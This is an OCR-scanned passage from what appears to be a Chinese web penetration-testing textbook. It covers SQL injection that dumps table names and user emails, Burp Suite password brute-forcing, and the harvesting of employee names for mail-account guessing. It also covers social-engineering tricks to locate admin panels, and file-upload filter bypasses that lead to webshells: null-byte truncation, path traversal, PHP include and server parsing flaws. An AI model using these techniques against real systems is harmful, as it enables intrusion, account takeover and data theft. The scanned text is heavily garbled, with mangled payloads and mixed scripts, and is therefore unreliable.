14", ! Туре": "15" ,"зог!": "16" |," зло": " \116210\0529ғ" } 


图 3-16 ”查询 数据 库 用 户 名 
可 以 看 到 user 为 ask(@*.*.61.105， 再 将 user0 巷 换 成 database0) 试 试 。 
如 图 3-17 所 示 ， 这 里 可 以 看 到 数据 库 为 ask， 接 下 来 继续 爆破 表 名 。 构 造 : 
') union select group сопса ( distinct table пате), 2,3,4,5,6,7,8,9,10, 


11,12,13,14,15,16 frm information schema.tables where table schema=database() # 
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Pragma: no-cache 
Content-Length: 570 


("status":"1","res":[("topic id":"1521","topic title" :" 
" "add time" : "1421635405" ,"discuss count":"1","topic de 
sceription":"", "topic pic":"","topic lock":0,"focus coun 
":"ask","topic title":"2","add ёіте" : "3" ,"discuss count 
":"4","topic desocription":"5","topic pic":"6","topic lo 
5" "sort":"16")],"info":" Wu6210Vu529f") 


图 3-17 ”查询 数据 库 名 
提交 后 ， 如 图 3-18 所 示 ， 可 以 看 到 表 名 已 经 在 返回 的 信息 中 了 。 


Pragma: no-cache 
Content-Length: 908 


t("status":"1","res":[t("topic id":"1521","topic title":"", "ада time" : "14216354 
05" ," discuss соил" : "1" ,"ёоріс desoeription":"" "topic pie":"" "topic lock":0, 
"focus count":0,"user related":0,"url token" :null ,"merged ій":0,"зео title":mn 
ull,"icon":null,"pid":0,"type":"question","sort":0)j,("topic id":"aws active А 
е comments,aws article vote,aws attach,aws category ,aws draft,aws ейт task,aw 
в ейт taskdata,aws edm userdata,aws ейт usergroup ,aws education experience ,aw 
s favorite, ,aws favorite tag,aws feature „амз Теа" ,"topic title":"2" "add time" 
n": "1 10" u "merged id" s " 11", " seo title" ° и 12" р "icon" s " 13" ж "pid" е и та" , и гуре":" 15" ж 
изот+" : "16" 1] ч "info" зи Ха) иа 


图 3-18 成 功 返 回 表 名 
将 表 名 整理 出 来 ， 可 以 清楚 地 看 到 表 结 构 ， 如 图 3-19 所 示 。 


ан= асі1уе дата 

алас апзнег 

ан= апсмег сопшеп! 8 

але апсмег Папка 
aws_answer_uninterested 
але апзшег vote 

ама арргоуа1 

алас аст1уе дата 

аи’ апзнег 

ан= апзнег comments 

алас апзиег _ thanks 
aws_answer_uninterested 
але апзиег уоте 
aws_approval 
aws_artlcle 
aws_artlcle_comments 
aws_article_vote 
aws_attach 

aws_category 

aws_draft 

aws_edm_task 
aws_edm_taskdata 
aws_edm_userdata 
aws_edm_usergroup 
aws_education_experience 
aws_favorite 
aws_favorite_tag 
aws_feature 

aws_fea 


83-19 ” 表 结 构 示意 图 
选 一 个 表 进 行 爆破 字段 ， 这 里 选 的 是 aws edm userdata， 其 hex 值 为 0x6177735f65646d 
5f7573657264617461， 因 此 构造 如 下 语句 : 
е тпотопезетесъ a group concat (distinct+column пате) ， да да 
пъ 6, 1; В; 9, 19. 11, 12, 13, 14. ТОЛЫК Оша ас зснеша. 
columns+where+table патше-0х617773516564645Е7573657264617461 + 
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结果 如 图 3-20 所 示 。 


ста: no-cache 
tent-Length: 585 


tatus":"1","res":[{"topic id":"1521","topic title":"","adc 
topic description":"","topic pic":"","topic lock":0,"focus 
11, "тегаей id":0,"seo title":null,"icon":null,"pid":0,"tyt 
topic title":"id,usergroup ‚ ета11" ‚"ааа ёіте" : "3" ,"Ятзсизз. 
_pic":"6","topic lock":"7","focus count":"8","user relatec 
seo title":"12} 
3-20 ”返回 字段 
从 结果 中 可 以 看 到 存在 id、usergroup 、email 三 个 字段 ， 这 里 只 暴露 出 email 字 段 的 
数据 ， 提 交 如 下 语句 : 
') +цпіоп+ѕе1есі+1, group concat (email, 0х2В), 3, 4, 5, 6, 7, 8, 9, 
10, 11, 12, 13, 14, 15, 16 +Егош+амз edm изегаака # 
结果 如 图 3-21 所 示 。 


("status":"1","res":[("topic id":"1521","topic title":"" "add time":"1421 
¿"topic description":"", "topic pic":"", "topic lock":0,"focus count":0,"us 


‚21710275 
"6", "Торас Тоск":" 7" „"Тосиз count":"8","user related":"9","url Токел": "10 
Те" . " 12" 4 Ш icon" . Ш 13" š "pid" . "N 14" к Ш Туре" . " 15" я Ш gort" . " 16" 8 я Ш info" . " Vu6210N 


图 3-21 注入 结果 


3.2.4 注入 延伸 


在 注入 中 经 常会 碰 到 的 一 种 情况 就 是 : 注入 得 到 的 加 密 过 的 密 文 却 解 不 开 。 对 于 此 问 
题 ， 在 这 里 讲解 几 种 可 行 的 办 法 。 

(1) 利用 国外 的 搜索 引擎 ， 往 往 会 有 意 想不到 的 收获 ， 最 常见 的 是 Google。 

(2) 用 Whois 碍 出 常理 员 邮 箱 ， 然 后 发 一 份 邮件 通知 管理 员 ， 让 其 更 改 密码 。 邮 
件 内 容 无 非 类 似 于 “我 们 是 xxx 检 测 中 心 ， 您 的 网 站 存在 风险 ， 请 立即 修改 管理 员 密 


(3) 分 析 Cookie。 有 时 加 密 过 的 密 文 会 出 现在 Cookie 里 ， 对 于 这 种 情况 ， 直 接 用 管 
理 员 的 密 文 替 换 原 来 Cookie 中 的 密 文 即 可 。 

(4) 在 特定 的 注入 环境 下 ， 有 时 候 可 以 用 新 密 文 蔡 换 掉 原来 的 密 文 。 当 然 ， 这 种 方 
法 的 执行 条 件 比 较 奇 刻 ， 在 实际 中 较 少 碰见 。 

(5) 利用 找 回 密码 功能 。 第 见 的 是 利用 密 保 问题 找 回 密码 ， 对 于 这 种 情况 ， 可 以 将 
密 保 问题 答案 注入 出 来 ， 然 后 利用 找 回 密码 功能 成 功 登录 目标 账户 。 

(6) 逻辑 缺陷 。 例 如 有 些 登 录 功 能 、 修 改 找 回 密码 功能 ， 在 数据 包 中 直接 用 密 文 传 
输 。 这 时 ， 就 可 以 用 得 到 的 密 文 进行 蔡 换 ， 从 而 进行 登录 、 更 改 密码 等 操作 。 
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3.3.1 利用 Burp 进 行 爆破 


Burp 是 Web 渗 透 中 用 于 爆破 的 最 常用 的 工具 ， 其 操作 极其 简单 ， 只 需要 简单 几 步 即 可 
实现 爆破 : 抓 包 ， 设 置 变量 ， 加 载 字 典 进 行 攻击 ， 返 回信 息 。 本 节 具 体 讲述 如 何 操作 。 

(1) 对 浏览 器 的 代理 进行 设置 ， 具 体 过 程 这 里 就 不 痔 述 了 。 设 置 完 毕 后 ， 打 开 有 目标 
站 点 。 

(2) 如 图 3-22 所 示 ， 这 里 随意 使 用 用 户 名 admin， 密 码 1234$6 登 录 ， 登 录 失 败 。 在 
Burp 中 可 以 看 到 刚才 登录 操作 的 数据 包 ， 如 图 3-23 所 示 。 


图 3-22 目标 爆破 页 面 
(3) 单 击 Burp 工 具 界 面 右 上 角 的 Action 按 钮 ， 可 以 看 到 如 图 3-24 所 示 的 下 拉 菜 单 栏 。 


й | | А 
k POST request to http:// /Login/LoginVenfy’Length=5 k= x Send to Spider 
| Previous | = Next = или | Do an active эсап 
Е Е ши Do a passive зсап 
| Send to Intruder Сі 
Raw | м Send to Repeater Ctrl+R 
POST /Login/LoginVerify?Length=5 НТТРИ1.1 Send to Sequencer 
Host; 
User-Agent: Моз111а/5.0 (Windows НТ 6.1; rv:39.0) Gecko/20100101 Firefox/39.D Sendto Comparer 
pt: %/% 


Sendto Decoder 


nguage: zh-CN,zh;q=D.8,en-US;q=D.5,en;q=0.3 
g Show response in browser 


application/x-www-form-urlencoded: charset=UTF-8 
X-Requested-With: XMLHttpRequest Request in browser > 
== Engagement tools F 
Copy URL 
Copy as curl command 
Copy to file 


Save item 


Convert selection к 
Cut Ctrl+X 
Copy Ctrl+C 
Paste Ctrl+V 


Message editor help 


Proxy history help 


图 3-23 ”登录 操作 发 送 的 数据 包 3-24 Action 下 拉 菜 单 栏 
(4) 选择 Send to Intruder， 单 击 该 命令 后 回 到 Bump 的 主 界面 ， 如 图 3-25 所 示 ， 可 以 看 到 主 
界面 的 mtruder 选 项 卡 会 加 亮 显 示 。 
(5) 切换 到 Intruder 选 项 卡 ， 单 击 Positions 选 项 ， 如 图 3-26 所 示 ， 可 以 看 到 刚才 抓 到 
的 数据 包 。 
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ТЕТІ ЛЕСЛЕСГИШШЕСІЛЕЛГ окон | comparer [Енем овом [лез — — 
[песе е options) 


Params | Edited | Status Length | MIME t... | Ежепз 
1 http-//123.249 48 9 /Login/LoginVerify?Length=5 


图 3-25 ”数据 包 成 send to intruder 
Burp Intruder Repeater Window Help 
| Target | Proxy | Spider | Scanner | Intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Options | Alerts | 
[1 = [2х | 
(Target ан] Payoads | Options 


(2) Payload Positions 


Сопйдиге the positions where payloads will be Inseited into the Базе request. The attack type determines the way in which payloads are assigned to payload 
positions - see help for full details. 


Attack type: | Sniper №) 


POST /1,041п/ LoginVverity7Lengrn=B58 HTTP/ 1.1 
Host; 


User-Agent: Mozilla/5.D (Windows МТ 6.1; rv:39.0) Gecko/20100101 Firefox/35.0 
рен ж/к 
Accept-Language: 21-СП,21:4<0.8,еп-03:4<-0.5,еп: 0.3 
Ассерс-Епс Виа ing; P=: deflate 
и ontent- си application/x-wgwv-form-urlencoded; charset=UTF-8 
F а With: Е ctpRequest 


летни даа 29 
ок $Р.МЕТ_5евз1їоп ld=§4f2lu3zllsjcobjxch00ejojb§ 
hasan а бт ке ный -alive 
Pragma: по-сас 
Cache-Control: no-cache 


UscrName" 8 Us er P vi ~ 81288568 


BBABA Резко (бе) 
图 3-26 “登录 包 
(6) 可 以 看 到 数据 包 中 有 些 字 符 被 标注 起 来 了 ， 这 是 Bump 对 变量 的 目 动 判断 并 标注 。 
单 击 Clear $ 按钮 ， 这 里 只 对 密码 进行 字典 替换 ， 所 以 选中 123456， 然 后 单 击 Add $ 按钮 。 
(7) 如 图 3-27 所 示 ， 此 时 123456 已 经 被 设 为 变量 了 ， 接 下 来 只 需 加 载 字 典 文件 ， 对 
其 进行 奉 换 ， 并 提交 数据 包 就 可 以 进行 爆破 了 。 选 中 Payloads 选 项 卡 ， 单 击 Load 按 钮 ， 进 
行 字 典 文 件 的 加 载 。 


Content-Length: 29 

Cookie: АЅР.МЕТ 5езз10п19<41211321133)053)хс!00езо)Б 
Connection: keep-alive 

Pragma: no-cache 

Cache-Control: no-cache 


UserName=admin&UserPvd=8S1234568] 


| ? || < | + | > | Туре а search term 


3-27 设置 爆破 变量 
(8) 如 图 3-28 所 示 ， 字 和 典 文件 加 载 完 毕 ， 便 可 以 进行 爆破 了 。 选 中 最 上 方 Intruder 选 
项 卡 ， 单 击 Start attack 命 令 ， 如 图 3-29 所 示 。 
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[2] Payload Options [Simple list] 


a simple list of strings that are used as payloads 


411111 
222222 
333333 
444444 
555555 
656556 

777177 


3-28 ”字典 文件 成 功 加 载 


Е Burp Suite Professional v1.5.18 - licensed to |аггу жи 


Шиа Repeater Window Help 


Save attack config 
? | Load attack config 


Copy attack config b number of payload sets depends on the attack type defined in the Positions tab. Various payload types аге | 
New tab behavior bad type сап Бе customized in different ways. | 


Automatic payload positions 
Conñgure predefined payload lists 


Payload count: 22 


р Request count: 22 


图 3-29 ”准备 开始 爆破 
(9) 这 时 可 以 看 到 返回 信息 在 不 停 深 动 。 待 字典 跑 完 后 ， 分 析 返 回 数 据 Length， 找 
出 正确 密码 。 如 图 3-30 所 示 ， 是 目标 站 点 的 爆破 结果 ， 可 以 看 到 除了 admin 人 返回 的 Length 
是 370， 其 他 的 都 是 354， 因 此 判断 admin 为 正确 密码 。 
ES пипат 


000000 
123455 
554321 
88888888 
abcdeig 
admin 
admin123 
admin888 
adminabc 
abc123 


口 
口 
О 
О 
О 
О 
Ü) 
e 
Ы 
D 


四 中 OO 


— 


СС 
maria 


POST /Login/LoginVerify?Length-5 HTTP/1.1 


图 3-30 ”爆破 结束 
Tips: 可 以 通过 Length 值 的 排序 来 快速 找 出 数值 不 同 的 项 。 
当然 ， 如 今 很 多 Web 站 点 都 有 验证 码 。 但 是 ， 验 证 码 依 旧 存 在 被 绕 过 的 风险 ， 利 用 
Python Image Library、Tesseract-OCR、Ppytesser 这 几 个 Python 第 三 方 库 ， 仅 二 值 化 、 文 字 分 
割 两 个 选项 就 能 轻松 识别 互联 网 60% 以 上 的 验证 码 。 


3.3.2 ”爆破 在 大 型 Web 站 点 渗透 中 的 作用 


在 对 大 型 Web 站 点 的 渗透 中 ， 一 般 不 会 直接 将 目标 放 到 主 站 上 ， 而 是 从 子 站 入 手 。 大 
家 都 知道 ， 一 个 大 型 站 点 一 定 有 些 内 部 人 员 登 录 的 系统 。 而 对 于 这 类 系统， 安全 往往 掌握 
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在 用 户 手 里 ， 因 为 很 多 安全 公司 认为 某 个 系统 只 有 固定 的 一 些 内 部 账号 能 登录 ， 而 其 里 面 
的 一 些 操作 引发 的 安全 问题 便 不 是 那么 重要 了 ， 因 此 开发 中 常常 会 有 很 多 疏忽 。 这 种 情况 
下 ， 内 部 人 员 密 码 的 强 弱 就 显得 格外 重要 ， 但 是 弱 口 令 仍 是 常 发 生 的 问题 。 

就 拿 内 部 邮件 系统 来 说 ， 不 妨 假设 渗透 目标 是 某 著 名 网 络 安 全 公司 A， 其 域名 是 www. 
aaa.com， 通 过 二 级 域名 的 爆破 ， 发 现 了 其 内 部 邮件 系统 mailaaa.com。 大 家 都 知悉 ， 一 般 
企业 邮箱 的 格式 都 为 : 用 户 名 @ 公 司 的 域名 ， 所 以 这 里 登录 的 账号 格式 应 该 是 : 用 户 名 @ 
aaa.com。 接 下 来 ， 可 以 用 搜索 引擎 对 @aaa.com 进 行 搜索 ， 很 快 便 可 以 发 现 用 户 名 的 命名 
规则 ， 而 一 般 都 是 以 员工 姓名 拼写 作为 用 户 名 。 

接 下 来 ， 答 试用 怜 虫 将 搜索 引擎 能 搜索 到 的 员工 名 字 都 肘 下 来 ， 搭 建 过 交互 站 点 的 人 
都 知道 ， 如 果 不 对 密码 的 复杂 度 作 要 求 ， 总 会 有 些 人 使 用 123436、88888888 这 样 的 弱 口 令 
作为 密码 ， 而 爆破 就 是 利用 这 一 特性 。 所 以 尽 可 能 多 地 搜集 其 员工 的 名 字 。 

当 员 工 名 字 搜 集 完 毕 以 后 ， 便 可 以 将 其 做 成 用 户 名 的 字典 文件 ， 然 后 选取 一 些 最 常见 
的 弱 口 令 ， 将 密码 设 为 不 变量 ， 用 户 名 设 为 变量 ， 从 而 进行 用 户 名 的 爆破 。 

当成 功 地 爆破 出 某 个 账户 的 账号 、 密 码 后 ， 尝 试 利 用 人 的 惰性 和 密码 的 通用 性 通 杀 其 
他 系统 ， 可 以 大 大 提高 渗透 效率 。 
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在 Web 渗 透 中 ， 后 台 文 件 的 利用 常常 会 有 意 想 不 到 的 效果 。 而 一 个 网 站 后 台 路 人 径 的 骏 
露 就 等 同 于 将 家 的 具体 位 置 给 暴露 了 ， 为 了 杜绝 这 种 现象 发 生 ， 开 发 人 员 经 常 采用 复制 的 
后 台 路 径 ， 给 渗透 市 来 了 难度 。 那 癌 见 的 后 台地 址 碍 找 方 法 又 有 哪些 呢 ? 


3.4.1 后 台地 址 查找 


1. ана. ЛЕН 


种 见 的 后 台 扫 描 顺 是 用 外 载 字 典 对 路 径 进 行 爆破 ， 而 这 种 方法 的 局 限 性 也 很 明显 ， 字 和 典 的 
强度 决定 了 成 功率 。 而 相 比 较 而 言 ， 爬 虫 贡 向 能 怜 出 那些 很 隐秘 的 目录 ， 增 加 爆破 的 成 功率 。 


2. 搜索 引擎 


对 于 后 人 台 查 找 ， 和 常用 的 语法 无 非 intext、inurl、intitle 等 最 基本 的 搜索 语法 ， 人 简单 又 实 
Я, АУРИХ. 


3. 页 面 信息 
在 火狐 浏览 器 中 访问 一 个 Web 站 点 ， 在 浏览 器 空白 界面 右 击 ， 单 击 “ 但 看 页 面 信 
恩 ”， 效 果 如 图 3-31 所 示 。 


N МА жазтенжнт 


https://www.baidu.com/favicon.ico 
https://www.baidu.com/img/baidu.svg 
https://www.baidu.com/img/bd_logo1.png 


https://www.baidu.com/img/baidu_jgylogo3.gif 


жайы: https://www.baidu.com/favicon.ico 
类 型 : X-ICON ве 

大 小 : 1.07 КВ (1,092 335) 

尺寸 : 16px x 16px 


C] ВШЕВ www.baidu.com #8 
айна : | ЖА) 另存 为 (A)... 


图 3-31 查看 页 面 信息 
在 媒体 页 面 信 息 中 可 以 看 到 多 媒体 文件 路 径 ， 包 括 图 片 等 的 路 径 。 因 为 这 些 图 片 往往 
是 管理 员 在 后 台 更 新 时 上 传 的 ， 而 有 些 Web 站 点 的 上 传 目 录 分 配 不 严格 ， 如 上 传 目录 是 后 
台 目 录 的 子 目 录 ， 所 以 导致 了 后 台 路 径 就 隐藏 在 图 片 路 径 中 。 


4. XSS 
XSS 的 危害 十 分 巨大 却 又 常 沼 被 忽略 ， 我 们 在 第 5 章 会 详细 讨论 更 多 的 前 端 技术 。 
5. 二 级 域名 及 其 他 端口 


在 对 大 型 网 站 进行 渗透 时 ， 常 常 发 现 一 个 现象 。 比 如 从 目标 站 点 的 一 个 二 级 域名 入 手 
进行 Web 渗 透 ， 但 其 后 台 登 录 接 口 往 往 是 男 一 个 二 级 域名 或 三 级 域名 。 因 此 在 渗透 中 用 脚 
本 对 目标 站 点 的 二 级 域名 进行 爆破 还 是 很 有 必要 的 。 

其 他 端口 又 怎么 样 呢 ? 一 般 Web 站 点 默认 端口 是 80 端 口 ， 但 在 实际 渗透 中 ， 常 常会 发 
现 某 个 站 点 前 台 确 实 是 80 端 口 ， 而 后 台 登 录 端 口 往往 是 其 他 端口 ， 像 8000、8080、8001 都 
很 常见 。 所 以 ， 在 渗透 前 对 目标 的 信息 搜集 要 尽量 到 位 和 全 面 ， 以 免 渗 透 中 为 此 浪费 大 量 
时 间 和 精力 。 


6. 访问 来 源 


此 方法 对 一 些 有 留言 板 或 是 能 和 管理 员 交 互 的 站 后 较为 肥效 。 前 先 ， 需 要 准备 一 个 目 
己 的 站 点 ， 然 后 在 此 站 点 中 添加 站 长 统计 的 JS， 将 准备 的 站 点 网 址 以 添加 友 链 的 名 义 发 给 
渗透 目标 的 管理 员 。 当 渗透 目标 的 管理 员 访 问 了 发 给 他 的 网 址 时 ， 这 时 在 站 长 统计 后 台 便 
能 看 到 访问 来 源 了 ， 而 一 般 管 理 员 是 在 后 台 对 一 些 留言 进行 审核 ， 所 以 访问 来 源 常 第 就 是 
后 台地 址 。 

在 开发 中 ， 后 台 是 为 了 方便 管理 员 对 网 站 进行 更 新 ， 因 此 功能 往往 很 多 ， 如 添加 管 
理 员 ， 数 据 库 备 份 下 载 ， 文 件 上 传 等 。 功 能 强大 ， 伴 随 而 来 的 第 利 是 安全 问题 。 在 渗 
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透 中 ， 对 后 台 的 巧妙 利用 更 胜 于 在 前 台大 费 周章 地 挖 据 漏 洞 。 那 常见 的 后 台 利 用 又 有 哪 
些 呢 ? 


342 后 台 验 证 绕 过 


渗透 中 ， 有 些 Web 站 点 的 后 台 使 用 了 JavaScript 验 
证 和 固定 cookie， 而 这 类 验证 被 绕 过 的 可 能 性 很 大 。 


就 拿 JavaScript 验 证 来 说 ， 因 为 它 发 生 在 客户 端 ， 因 此 非法 操作 ， 请 先 登录 后 再 进行 操作 1 
对 于 这 类 后 台 只 要 在 浏览 器 中 把 JavaScript 禁 止 掉 就 
能 正常 访问 后 台 了 。 例 如 ， 蓝 科 CMS 中 对 后 台 的 验证 
就 是 JavaScript， 如 图 3-32 所 示 ， 可 以 看 到 JS 开启 的 时 


候 ， 无 法 访问 后 人 台 。 图 3-32 ”JS 脚本 对 权限 进行 了 验证 
当 把 火狐 浏览 器 的 javascript.enabled 设 置 为 false 时 ， 再 次 对 后 台 进 行 访问 ， 如 图 3-33 所 
示 ， 可 以 看 到 成 功 访问 了 后 台 ， 轻 松 地 绕 过 了 JavaScript 的 验证 。 


图 3-33 成 功 进入 后 台 


343 ”后台 越权 


局 部 未 授权 访问 是 很 多 后 台 出 现 的 问题 ， 意 思 就 是 后 台中 的 茶 个 页 面 可 以 被 访问 。 最 
币 见 的 关 似 于 管理 员 管 理 、 数 据 库 操作 、 文 件 上 传 之 类 ， 从 而 引发 任意 添加 管理 员 、 数 据 
涝 露 、getshell 等 严重 问题 。 而 当面 对 后 台 里 那些 非 高 危 的 越权 时 ， 应 该 怎么 办 呢 ? 


1. 越权 XSS 
对 于 一 些 低 危 的 后 台 越 权 ， 开 发 者 们 常常 不 怎么 重视 ， 而 往往 问题 都 是 出 在 小 问题 
上 。 大 多 数 情况 下 ， 后 台 相 比 前 台 要 脆弱 太 多 ， 很 多 后 台 XSS、 后 台 注 入 之 类 ， 在 开发 
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者 、 攻 击 者 眼中 很 “鸡肋 ”， 但 是 如 果 将 其 与 越权 结合 起 来 ， 其 实质 就 和 前 人 台 的 漏洞 差 
不 多 。 例 如 网 站 基本 信息 页 面 的 越权 ， 单 从 越权 角度 来 看 确实 没什么 影响 ， 无 非 是 一 些 
公司 名 之 类 的 。 但 是 如 果 攻 击 者 在 基本 信息 中 插入 XSS 代 码 ， 那 危害 性 甚至 超过 了 前 台 
的 XSS。 


2. 越权 注入 


后 台中 常常 也 有 很 多 数据 库 胡 询 ， 如 新 闻 搜 索 与 会 员 操 作 等 。 其实， 对 数据 库 的 任何 
操作 都 有 可 能 引发 注入 ， 而 往往 后 台 本 身 有 很 多 注入 ， 但 后 台 经 常 忽 视 。 例 如 新 闻 管 理 页 
面 的 越权 ， 无 论 是 新 闻 的 删除 、 添 加 、 修 改 或 搜索 都 要 对 数据 库 进 行 操 作 ， 如 果 开 发 者 因 
为 其 是 后 台 而 未 做 过 滤 或 过 滤 不 足 的 话 ， 那 危害 可 想 而 知 。 


344 后 台 文 件 的 利用 


对 于 后 台 文 件 的 利用 ， 第 见 的 有 文件 上 传 、 备 份 下载 、 数 据 库 下 载 、robots.txt、 探 针 
和 等， 这些 文件 带 来 的 影响 有 大 有 小 ， 上 人 至 getshell， 下 人 至 信息 泄漏 。 对 于 后 台 文 件 扫描 ， 只 
需要 留意 某 些 特定 的 后 级 即 可 ， 如 rar、txt、mdb、sgl 等 ， 这 样 能 大 大 节省 扫描 时 间 ， 提 高 
效率 。 
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文件 上 传 是 最 常见 的 getshell 方 法 之 一 。 而 文件 上 传 的 验证 大 致 可 以 分 为 两 类 : YG 
验证 和 服务 端 验证 ， 在 这 里 讲解 常见 的 上 传 验证 的 统 过 。 


3.5.1 钊 见 的 验证 方式 及 统 过 


1. JavaScript 验 证 绕 过 


JavaScript 验 证 就 是 所 谓 的 客户 并 验证 ， 也 是 最 脆弱 的 一 种 验证 。 直 接 修 改 数据 包 或 
禁用 JavaScript 即 可 绕 过 。 


2. content-type 验 证 绕 过 


content-type 验 证 ， 最 常见 的 是 判断 content-type 是 否 为 image/gif。 对 于 这 种 验证 直接 修 
改 数据 包 中 的 content-type 为 Image/gif 即 可 ， 如 图 3-34 所 示 。 


3. 黑 名 单 检 测 绕 过 
黑 名 单 检 测 是 常见 的 一 种 上 传 验 证 方式 ， 不 允许 上 传 黑 名 单 中 存在 的 扩展 名 ， 其 安全 
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性 低 于 日 名 单 检 测 ， 对 其 的 绕 过 方式 也 远 多 于 白 名 单 检测 。 对 于 黑 名 单 检测 绕 过 的 常见 思 
ЕНІ КЛ,» 

СОНАН ЕВ Ян, м Aasa, сег. 

(22 大 小 写 混 清 绕 过 ， 如 AsP、pHp。 

(3) 利用 解析 漏洞 绕 过 。 

(4) 特别 文件 名 构造 。 

(5) 截断 上 传 。 


Cookie: PHPSESSID=pf8tvcbhbes3u0q7km7cb7q9d3s6 
Connection: keep-alive 
Eontent-Type: image/gif; 


2929179416656 


2929179416656 
Content-Disposition: form-data; name="news title" 


图 3-34 修改 content-type 


4 日 名 单 检 测 绕 过 


日 名 单 检 测 安 全 性 远 融 于 黑 名 单 检 测 ， 仅 允许 上 传 白 名 单 所 允许 的 几 种 扩展 名 ， 因 此 
黑 名 单 中 的 大 小 写 混淆 、 特 殊 的 扩展 名 等 绕 过 方式 对 白 名 单 检 测 均 无 效 。 但 仍 可 以 用 截断 
上 传 、 解 析 漏 洞 、 特 别 文 件 名 构造 对 其 进行 绕 过 。 


5. 对 危险 扩展 名 POST 检 测 的 绕 过 


在 开发 中 ， 为 了 方便 维护 和 更 新 ， 会 先 对 扩展 名 进行 验证 ， 如 果 上 传 文件 的 扩展 名 为 
可 执行 脚本 ， 便 会 对 其 POST 的 数据 进行 检测 ， 如 果 存 在 恶意 代码 就 会 禁止 上 传 。 而 对 于 
这 类 上 传 检测 的 绕 过 大 臻 有 这 几 种 思路 ， 一 是 利用 变种 木马 绕 过 其 检测 ， 二 就 是 用 包含 文 
件 对 其 进行 绕 过 。 就 命 PHP 来 说 ， 先 将 一 句 话 木马 放 进 一 个 txt 文 件 中 ， 因 为 txt 并 非 可 执行 
脚本 ， 因 此 成 功 上 传 ， 然后 再 将 如 图 3-35 所 示 的 代码 放 进 一 个 PHP 文 件 中 ， 加 载 外 部 xx.txt 
文件 。 
<?php 
include 'хх.їхї'; 
?3 
图 3-35 ”加 载 外 部 x x .txt 文 件 
利用 PHP 中 的 include 函 数 将 刚才 上 传 的 txt 文件 包含 进去 ， 而 因 PHP 中 include 是 芝 用 函 
数 ， 一 般 POST 检 测 不 会 认为 其 是 恶意 代码 ， 因 此 成 功 上 传 ， 从 而 绕 过 限制 执行 恶意 代码 。 


6. 服务 器 目录 限制 的 绕 过 


有 的 Web 应 用 程序 本 身 对 扩展 名 并 没有 什么 验证 ， 而 是 在 服务 器 上 对 上 传 目 录 人 允许 上 
传 的 文件 扩展 名 进行 限制 。 而 对 于 这 类 防御 方法 ， 如 果 能 控制 上 传 路 径 即 能 成 功 绕 过 了 。 
其 中 最 第 见 的 便 是 上 传 路 径 被 写 在 了 数据 包 中 ， 对 此 直接 修改 数据 包 即 可 ， 如 图 3-36 所 
示 ， 这 里 用 ../ 跳 出 被 限制 的 目录 。 
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img 

ЕЕ гаҒсь24с0832 
Content-Disposition: form-data; name= uppath” 
гаў 

— T тағсь24с0832 


Сопіепі-ріѕроѕіїіоп: form-data; name= Submit” 


图 3-36 直接 修改 上 传 路 径 
还 有 些 不 常见 的 ， 直 接 在 文件 名 前 加 ../ 进 行 目录 的 跳出 ， 如 图 3-37 所 示 。 


533 

一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 2929179416656 
Content-Disposition: form-data; name="img thumb"; 
Ё11епате="../2.рНр" 


Content-Type: арр11сас1оп/оссес-зскеат 


图 3-37 ”构造 特殊 文件 名 跳出 当前 目录 
3.5.2 具体 剖析 一 些 绕 过 手法 


1. 截断 上 传 


常见 的 截断 就 是 利用 %00 或 %80-%99 对 文件 名 进行 截断 从 而 绕 过 验证 。 在 Burp 中 可 以 
修改 其 hex 值 进行 截断 ， 如 图 3-38 所 示 。 


----------------------------- 2929179416556 
Сопсепс-різрозісіоп: form-data; name="img thumb"; 
filename="1 php; Jpg" 

Content-Type: application/octet-stream 


图 3-38 ”构造 特殊 文件 名 
将 文件 名 中 的 hex 值 替换 为 00， 如 图 3-39 和 图 3-40 所 示 。 


0 20 be b1 bd b5 за 22 by bd т-дага; name= Im 
22 3b 20 66 69 бс 65 бе 61 gthumb ;fena 

2688 то D |2 ба 70 67 22 04 me="1php; jpg" 

в 74 24 54 79 70 65 За 20 61 ContentType:a 

4 69 6 6 Ж 6 63 74 65 74 pplication/octet 

3 0а 0a 04 Oa 04 0а 22 22 2d -stream 一 

з ж 2 24 24 24 2 24 24 2d 


^а ^а мт: г гт MAMMA a" 


图 3-39 分 号 的 位 置 


一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 2929179416555 
Content-Disposition: form-data; name="img thumb"; filename="|L.phpõ0.jpg" 
Content-Type: application/octet-stream 


图 3-40 ”hex 值 成 功 被 修改 
2. 解析 漏洞 


某 些 Web 应 用 程序 对 上 传 后 的 文件 没有 进行 重 命名 。 对 此 ， 可 以 尝试 用 一 些 解 析 漏 洞 
进行 绕 过 。 
(1) IIS 6.0 解 析 漏 洞 
利用 IIS 6.0 解 析 漏 洞 的 方法 有 两 种 : 目录 解析 和 文件 解析 。 对 于 目录 解析 ， 其 原理 
是 在 网 站 下 建立 名 字 为 x.asp、x.asa 的 文件 夹 ， 其 目录 内 任何 扩展 名 的 文件 都 被 IIS 当 作 
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ASP 文 件 来 解析 并 执行 ， 如 /xx.asp/xx.jpg，xx.jpg 会 被 当 作 ASP 执 行 。 对 于 文件 解析 ， 如 
xx.asp; .jpg， 分 号 后 面 的 不 被 解析 ， 因 此 等 同 于 xx.asp。 
(2) Nginx 解 析 漏 洞 
在 默认 Fast-CGI 开 局 状况 下 ， 上 传 一 个 含有 恶意 代码 的 图 片 ， 其 URL 如 : xxx.com/xx. 
jpg。 当 访问 Xxx.com/Xxx.jpg/.php 时 ， 原 本 的 xx.jpg 便 会 被 当 作 php 执 行 了 。 
(3) Nginx <8.03 衬 字 节 代码 执行 漏洞 
在 上 传 的 图 片 中 插入 恶意 代码 ， 然 后 通过 访问 Xxx.jpg%00.php 来 执行 其 中 的 代码 。 
(4) Араспей Br 38 E] 
Apache 是 从 右 到 左 开始 判断 解析 ， 如 果 为 不 可 识别 解析 ， 就 再 往 左 判断 ， 比 如 
xx.php.owf.rar 中 .owf 和 .rar 这 两 种 后 级 是 Apache 不 可 识别 解析 ，Apache 就 会 把 xx.php.owf. 
rar 解 析 成 php。 


3. 特别 文件 名 构造 


在 黑 合 中， 对 于 一 些 不 合 规范 的 上 传 验证 ， 常 常会 出 现 一 些 罪 夷 所 思 的 绕 过 。 例 如 : 
xx.php“.”jpg、xx.php 等 ， 对 于 这 类 验证 ， 在 黑 盒 环境 下 常常 需要 进行 大 量 尝 试 。 


3.6 ”getshell 的 其 他 万 式 


